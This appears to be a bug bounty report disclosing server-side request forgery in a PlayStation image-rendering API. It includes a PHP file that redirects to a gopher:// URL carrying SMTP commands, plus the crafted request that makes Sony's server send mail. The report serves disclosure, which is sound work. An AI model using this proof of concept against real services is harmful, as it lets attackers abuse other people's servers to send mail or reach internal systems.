SSRF on image renderer

## Summary: image.api.np.km.playstation.net allows image urls to be passed via the `image` parameter It is possible to use this endpoint to send Gopher requests that result in SMTP messages being sent ## Steps To Reproduce: 1. Create a Gopher redirect PHP file to save to your server ``` <?php $commands = array( 'HELO test.org', 'MAIL FROM: <[email protected]>', 'RCPT TO: <[email protected]>', 'DATA', 'Test mail', '.' ); $payload = implode('%0A', $commands); header('Location: gopher://test.smtp.org:25/_'.$payload); ?> ``` 2. Point the URL to your file location via the `image` parameter https://image.api.np.km.playstation.net/images/?format=png&image=http%3A%2F%2Fblackdoorsec.net/gopher3.php It will return a 404 message, but you will see that your server is hit {F737783} {F737781} 3. Check the log http://test.smtp.org/log {F737782} Confirms the ec2 instance sending the email ## Supporting Material/References: ``` GET /images/?format=png&image=http%3A%2F%2Fblackdoorsec.net/gopher3.php HTTP/1.1 Host: image.api.np.km.playstation.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 ``` Related issue https://hackerone.com/reports/115748 ## Impact craft server requests using sony servers